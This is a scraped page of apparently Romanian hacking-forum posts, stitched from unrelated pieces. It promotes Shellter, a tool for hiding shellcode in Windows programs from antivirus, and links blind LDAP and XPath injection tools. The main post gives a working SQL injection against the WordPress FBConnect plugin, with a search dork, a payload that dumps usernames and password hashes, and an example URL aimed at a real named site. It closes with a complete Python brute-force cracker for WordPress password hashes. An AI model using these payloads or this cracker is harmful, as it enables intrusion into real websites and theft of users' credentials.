Search the Community

Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access, and whatever would look dodgy under an AV scan. It uses a unique dynamic approach which is based on the execution flow of the target application. This means that no static/predefined locations are used for shellcode injection. Shellter will launch and trace the target, while at the same time will log the execution flow of the application. Also supports encoded/self-decrypting payloads by taking advantage of the Imports Table of the application. It will look for specific imported APIs that can be used on runtime to execute a self-decrypting payload without doing any modifications in the section’s characteristics from inside the PE Header. At the moment 7 methods are supported for loading encoded payloads: 0. VirtualAlloc 1. VirtualAllocEx 2. VirtualProtect 3. VirtualProtectEx 4. HeapCreate/HeapAlloc 5. LoadLibrary/GetProcAddress 6. CreateFileMapping/MapViewOfFile Read more... Download Password: _Sh3llt3r_ Source

Rasfoind portaluri pe care BOR le promoveaza fara SEO am gasit asta http://www.icoaneortodoxe.com.ro/php/image.php?image_id=2078 si ghiciti ce?

Sample application showing practical approach how to exploit Blind LDAP Injection flaw. The tool is intended to be used by IT security researchers and pentesters for educational purposes only. It was first presented at Black Hat 2011. Download: http://ldap-blind-explorer.googlecode.com/files/Ldap%20Blind%20Explorer%201.0.zip

Sample application showing practical approach how to exploit Blind XPath Injection flaw. The tool is intended to be used by IT security researchers and pentesters for educational purposes only. It was first presented at Black Hat 2011. Download: http://xpath-blind-explorer.googlecode.com/files/Xpath%20Blind%20Explorer%201.0.zip

Wordpress Sql Injection App : FBConnect WordPress Plugin Type : Sql-Injection Dork : inurl:"fbconnect_action=myhome" Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- Exemple: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users-- ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python): # code by : tdxev # website : www.tdxev.com # team : www.insecurity.ro # version : 2011.01.17 # documentation : /wp-includes/class-phpass.php import md5 import time # user settings wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made # app settings itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' # use by crypt_private def encode64 (textInput,count): output = '' i = 0 while i < count : i = i + 1 value = ord(textInput[i-1]) output = output + itoa64[value & 63] if i < count : value = value | ord(textInput[i]) << 8 output = output + itoa64[(value >> 6) & 63] i = i + 1 if i >= count: break if i < count: value = value | ord(textInput[i]) <<16 output = output + itoa64[(value >> 12) & 63] i = i + 1 if i >= count: break output = output + itoa64[(value >> 18) & 63] return output # generate wordpress hash def crypt_private (plainText, wordpressHash): output = '*0' # old type | not suported yet if wordpressHash[0:2] == output: output = '*1' if wordpressHash[0:3] != '$P$': # old type | not suported yet return output count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash if (count_log2 < 7) or (count_log2>30): return output count = 1 << count_log2 # get who many times will generate the hash salt = wordpressHash[4:12] # get salt from the wordpress hash if len(salt) != 8 : return output plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try for i in range (count): plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt) output = output + encode64(plainTextHash,16) # create the new hash return output # class that generate the words class wordGenerator (): def __init__(self, word, charSet): self.setCurretWord(word) # word to start self.setCharSet(charSet) # characther set used to generate the words # set current word def setCurretWord (self, word): self.currentWord = word # set the character set that will be used def setCharSet (self, charSet): self.charSet = charSet # generate the next word set that word as currentWord and retutn the word def nextWord (self): self.setCurretWord( self._incWord(self.currentWord) ) return self.currentWord # generate the next word def _incWord(self, word): word = str(word) # convert to string if word == '': # if word is empty return self.charSet[0] # return first char from the char set wordLastChar = word[len(word)-1] # get the last char wordLeftSide = word[0:len(word)-1] # get word without the last char lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set else: # it is the last char wordLastChar = self.charSet[0] # reset last chat to have first character from the char set wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased return wordLeftSide + wordLastChar # return the next word # check if is right type of hashs for wpHash in wpHashList: if wpHash[0:3] != '$P$': print "Wrong password type or password type is DES not impemented yet!" exit() # create a new wordGenerator newWord = wordGenerator ('',charSet); # word generator wordsFound = 0 exitLoop = False def found(hashItem, word): global wordsFound global exitLoop d = open(dumpFile,'a') # open file for append d.write(hashItem + ' = ' + word +"\n") # write the result d.close() # close file wordsFound = wordsFound + 1 # increase the number of hashs cracked print hashItem + ' = ' + word # display the word if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list exitLoop = True # rise flag to stop the loop and exit def setProgress(word) : d = open(progFile,'w') # open file for append d.write("Position :"+ word +"\n") # write the current word d.close() # close file count = 0 while exitLoop == False: word = newWord.nextWord() count = count + 1 #print word for wpHash in wpHashList: newHash = crypt_private(word,wpHash) if wpHash == newHash : found(newHash,word) if count == 1000 : count = 0 setProgress(word) H4ve fun :D:D